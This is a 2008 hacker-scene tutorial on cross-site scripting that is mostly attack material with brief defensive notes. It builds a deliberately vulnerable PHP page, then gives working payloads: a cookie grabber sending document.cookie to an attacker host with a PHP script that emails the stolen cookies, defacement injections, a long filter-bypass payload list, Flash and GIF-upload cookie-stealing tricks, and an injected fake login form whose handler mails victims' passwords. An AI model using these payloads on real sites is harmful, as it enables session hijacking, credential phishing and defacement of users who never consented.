Advertisements

 Paper: Cross Site Scripting - Attack and Defense Guide

Written by Xylitol, Xylitol.free.fr

Tuesday, 26 February 2008

                                                                           ____
/ /
________________________________________________________________________/ /
| / /
| Cross Site Scripting - Attack and Defense guide / /
|_____________________________________________________________________/ /
/ /
By Xylitol 10-02-08 /___/


Author: Xylitol

Description: a simple guide on XSS methods.

Homepage: http://xylitol.free.fr

Contact: Xylitol[at]fbi[dot]gov

Date: 10/02/08


Summary:
1> What is XSS ?
2> Code a XSS vulnerability
3> Make a cookie grabber
4> Securing XSS
5> Deface Methods
6> Filteration Bypassing
7> Flash attak
8> XSS upload
9> phishing XSS


____ ____
/ / \ \
______/ /_____________________________________\ \______
| / / \ \ |
| / /.: Chapter 1 - What is XSS ? :.\ \ |
|___/ /___________________________________________\ \___|
/ / (From Wikipedia, the free encyclopedia) \ \
/___/ \___\



Cross-zone scripting is a browser exploit taking
advantage of a vulnerability within a zone-based security solution.
The attack allows content (scripts) in unprivileged zones
to be executed with the permissions of a privileged zone - i.e.
a privilege escalation within the client (web browser) executing the script.
The vulnerability could be:

* a web browser bug which under some conditions allows content (scripts)
in one zone to be executed with the permissions of a higher privileged zone.

* a web browser configuration error; unsafe sites listed in privileged zones.

* a cross-site scripting vulnerability within a privileged zone

A common attack scenario involves two steps.
The first step is to use a Cross Zone Scripting vulnerability
to get scripts executed within a privileged zone. To complete the attack,
then perform malicious actions on the computer using insecure ActiveX components.

This type of vulnerability has been exploited to silently install
various malware (such as spyware, remote control software, worms and such)
onto computers browsing a malicious web page.




____ ____
/ / \ \
______/ /_____________________________________\ \______
| / / \ \ |
| / /.:Chapter 2 - Code a XSS vulnerability :.\ \ |
|___/ /___________________________________________\ \___|
/ / \ \
/___/ \___\



Open notepad and copy/past this script:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style><title>Simple XSS vulnerability by Xylitol</title>
<body>
<form action="XSS.php" method="post">
<p align="center"><strong>Simple XSS vulnerability by Xylitol </strong></p>
<div align="center">
<table width="270" border="0">
<tr>
<td width="106"><strong>Search:</strong></td>
<td width="154"><input name="Vulnerability" type="text" id="Vulnerability" /></td>
</tr>
</table>
<table width="268" border="0">
<tr>
<td width="262"><div align="center">
<input name="submit" type="submit" value=" Search it ! " />
</div></td>
</tr>
</table>
</div>
</form>
</body>
</html>




after, save this page: index.html
open a new notpad and Copy/past that:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Search result:</title>
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style></head>
<body>
<span class="alerte">Search result :</span>&nbsp;<strong><?php echo $_POST['Vulnerability']; ?></strong>&nbsp;
</body>
</html>

save this page in: XSS.php
close notepad

open index.html in firefox
enter a value and search
return on the page of research and enter <script>alert('XSS')</script>
send the form
bingo a dialogue box !

_______________________________________
/ http://127.0.0.1 dit: X \
|________________________________________|
| |
| |
| ^ |
| / \ |
| / | \ XSS |
| / . \ |
| ------- |
| ______ |
| | OK | |
| ------ |
|________________________________________|
XSS Vulnerability is here...





____ ____
/ / \ \
______/ /____________________________________\ \______
| / / \ \ |
| / /.: Chapter 3 - Make a cookie grabbers :.\ \ |
|___/ /__________________________________________\ \___|
/ / \ \
/___/ \___\



insert this script in a vulnerable page (for exemple a guestbook)

<script>
window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie);
</script>


(www.Hax0r.com = your site)
Open notepad and make a page: cookie.php
copy/past this code:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Error</title>
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style></head>
<? mail('email@example.com', 'Cookie stealed ! - thx xyli :)', $cookies); ?>
<body>
<h2><strong>Error</strong> - <strong>Access denied</strong> for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2>
</body>
</html>


It is not enough any more but for the pirate,
than to await the reception of the email and to read the cookie there.



____ ____
/ / \ \
______/ /___________________________________\ \______
| / / \ \ |
| / /.: Chapter 4 - Securing XSS :.\ \ |
|___/ /_________________________________________\ \___|
/ / \ \
/___/ \___\


FIX it:
for fix XSS Vulnerability use htmlentities:


in line 16 Remplace:
<body>
<span class="alerte">Search result :</span>&nbsp;<strong><?php echo $_POST['Vulnerability']; ?></strong>&nbsp;
</body>

By:

<body>
<span class="alerte">Search result :</span>&nbsp;<strong><?php
if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?></strong>&nbsp;
</body>


use htmlspecialchars() function in PHP ;)

other function:
htmlentities() quotes
strip_tags()
...

____ ____
/ / \ \
______/ /___________________________________\ \______
| / / \ \ |
| / /.: Chapter 5 -deface Methods :.\ \ |
|___/ /_________________________________________\ \___|
/ / \ \
/___/ \___\


defacer with a XSS and a rather simple thing
here are the principal ones…

defacement by an image:
<IMG SRC="http://hax0r.com/Haxored.png">

or a video flash:
<EMBED SRC="http://hax0r.com/Haxored.swf"


more knew: the redirection:
<script>window.open( "http://www.hax0r.com/Haxored.html" )</script>

also see:
<meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" />




____ ____
/ / \ \
______/ /___________________________________\ \______
| / / \ \ |
| / /.: Chapter 6 - Filteration Bypassing :.\ \ |
|___/ /_________________________________________\ \___|
/ / \ \
/___/ \___\


actually it's not that easy to bypass htmlspecialchars()
here some other example of xss Bypass:

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;
URL=http://;URL=javascript:alert('XSS');\">

<META HTTP-EQUIV=\"refresh\"
CONTENT=\"0;url=javascript:alert('XSS');\">

'">><marquee><h1>XSS</h1></marquee>

'">><script>alert('XSS')</script>

'>><marquee><h1>XSS</h1></marquee>

"><script alert(String.fromCharCode(88,83,83))</script>

<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>

<div
style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCo
de(88,83,83));'))">

window.alert("Xyli !");

"/></a></><img src=1.gif onerror=alert(1)>

[color=red' onmouseover="alert('xss')"]mouse over[/color]

<body onLoad="alert('XSS');"

<body onunload="javascript:alert('XSS');">

[url=javascript:alert('XSS');]click me[/url]

<script language="JavaScript">alert('XSS')</script>

<img src="javascript:alert('XSS')">

'); alert('XSS

<font style='color:expression(alert(document.cookie))'>

<IMG DYNSRC=\"javascript:alert('XSS')\">

<IMG LOWSRC=\"javascript:alert('XSS')\">

</textarea><script>alert(/xss/)</script>

</title><script>alert(/xss/)</script>

<script src=http://yoursite.com/your_files.js></script>

"><script>alert(0)</script>

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">

<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">

<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">

<marquee><script>alert('XSS')</script></marquee>

<? echo('<scr)';
echo('ipt>alert(\"XSS\")</script>'); ?>

<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">

<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">

<marquee><script>alert('XSS')</script></marquee>

<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>

<img src=foo.png onerror=alert(/xssed/) />

<script>alert(String.fromCharCode(88,83,83))</script>

<scr<script>ipt>alert('XSS');</scr</script>ipt>

<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+
escape(document.cookie)</script>

<script src="http://www.evilsite.org/cookiegrabber.php"></script>

<script>alert('XSS');</script>

<script>alert(1);</script>


Here and there is of it full with others
google is your friends
____ ____
/ / \ \
______/ /___________________________________\ \______
| / / \ \ |
| / /.: Chapter 7 - Flash attack :.\ \ |
|___/ /_________________________________________\ \___|
/ / \ \
/___/ \___\

Flash is used for complex animations, simulations,
*creation of games etc..
What’s interesting for us is the getURL() action.
This function allows us to redirect the end user to another page.
its syntax is built as follows:
getURL(url:String, [window: String,[method:String]])
exemple:
getURL("http://victime.com/login.php?logout=true","_self");


url: indicate the URL of the site
window: specify within which framework the request must take place (_self, _blank…)
method: method of request GET or POST (by defect GET)


here the handling of the actionscript and the Javascript to post a alert:
getURL("javascript:alert('XSS'");



in 2002 one will show the danger of this facility,
one could for example post the cookie of visitors in this manner:
getURL("javascript:alert(document.cookie)")

in December 2005, a new alternative and appeared
consisting has to benefit from a nonpermanent fault XSS
and possibility of putting a file flash in its signature to give a permanent XSS,
moreover the author of this alternative used this technique in order
to infect MySpace with a deviated worms xss of Samy: Samy Reloaded

cookie stealer in flash ?
not but there is technique to do it
exemple
in a flash file:
GetURL("http://www.victime.com/page.php?var=<script src='http://www.hax0r.com/Haxored.js'></script>","_self");

and in Haxored.js:
document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie;


For secure it simple solution: do not allow flash files in your web app


____ ____
/ / \ \
______/ /______________________________________\ \______
| / / \ \ |
| / /.: Chapter 8 - XSS upload :.\ \ |
|___/ /____________________________________________\ \___|
/ / \ \
/___/ \___\

Make Haxored.gif in paint for exemple
after open Haxored.GIF in notepad
delete all line and insert this:
GIF89a<script>alert("XSS")</script>

save and close it
upload Haxored.gif in a free image hoster look your image
and XSS is here...
dont take Mozillia Firefox for look your image but Mozillia dont run your alert
use Internet explorer

Why add GIF89a ?
well some upload like this one, check that the 'GIF89a' code
is contained in the image as in any .GIF respective.
the vulnerability of this upload results from the checking 'GIF89a' code
for confirmation but of nothing the possible malicious codes contained in this image.
GIF89a<script src="http://hax0r.com/cookiegrabber.php"></script>

to know the code for another image format,
it is just enough to open an image jpg or other with a text editor,
for example a png file: ‰PNG

PNG = ‰PNG
GIF = GIF89a
JPG = ÿØÿà JFIF
BMP = BMFÖ


For secure it dont check getimagesize() only



____ ____
/ / \ \
______/ /______________________________________\ \______
| / / \ \ |
| / /.: Chapter 9 - Phishing XSS :.\ \ |
|___/ /____________________________________________\ \___|
/ / \ \
/___/ \___\

you understood the goal of the phishing ?
and XSS ?

in our example it will be necessary to find a Vulnerable site to the XSS
and to inject there oneself in a form to oneself directly in the URL the following code:


<p>Enter your login and password, thank:</p>
<form action="http://hax0r.com/mail.php">
<table><tr><td>Login:</td><td><input type=text length=20 name=login>
</td></tr><tr><td>Password:</td><td>
<input type=text length=20 name=password>
</td></tr></table><input type=submit value= OK >
</form>




you will have it to guess script will simulate a form of connextion and send the value to you
example of file php for sending this email (mail.php):



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Error</title>
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style></head>
<?php
$login = $HTTP_GET_VARS["login"];
$password = $HTTP_GET_VARS["password"];
mail("email@example.com", "Cookie stealed ! - thx xyli :)", $password , $login );
?>
<body>
<h2><strong>Error</strong> -<strong> Server too much busy</strong></h2>
</body>
</html>




the user will believe that the waiter and overloads some and will not suspect nothing
I think that you understood this principle ?




____ ____
/ / \ \
______/ /______________________________________\ \______
| / / \ \ |
| / /.: Xylitol respects and hello's fly out :.\ \ |
|___/ /____________________________________________\ \___|
/ / \ \
/___/ \___\

nexus, Langy, Uber0n, FullFreeez, RePliKaN!, bl00d, c0de91, Xonzai
Agent-D, Agent-Z, Vamp, Xspider, Mitnick, Honnox, Blwood, str0ke

and all hardworking sceners in the scene !

_________________________________
| |
| .: Xylitol thanks this sites :. |
|_________________________________|

http://www.googlebig.com/
http://xssed.com/
http://www.xssing.com/
http://www.milw0rm.com/
http://H4cky0u.org/


If you want to contact me for any stupid reason,
drop me an MSN or WLM only: Xylitol[at]fbi[dot]gov
____
\ \
\ \_____________________________________________________________________________
\ \ |
\ \ Cross Site Scripting - Attack and Defense guide |
\ \__________________________________________________________________________|
\ \
\___\ By Xylitol 10-02-08



Share this content:
        
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.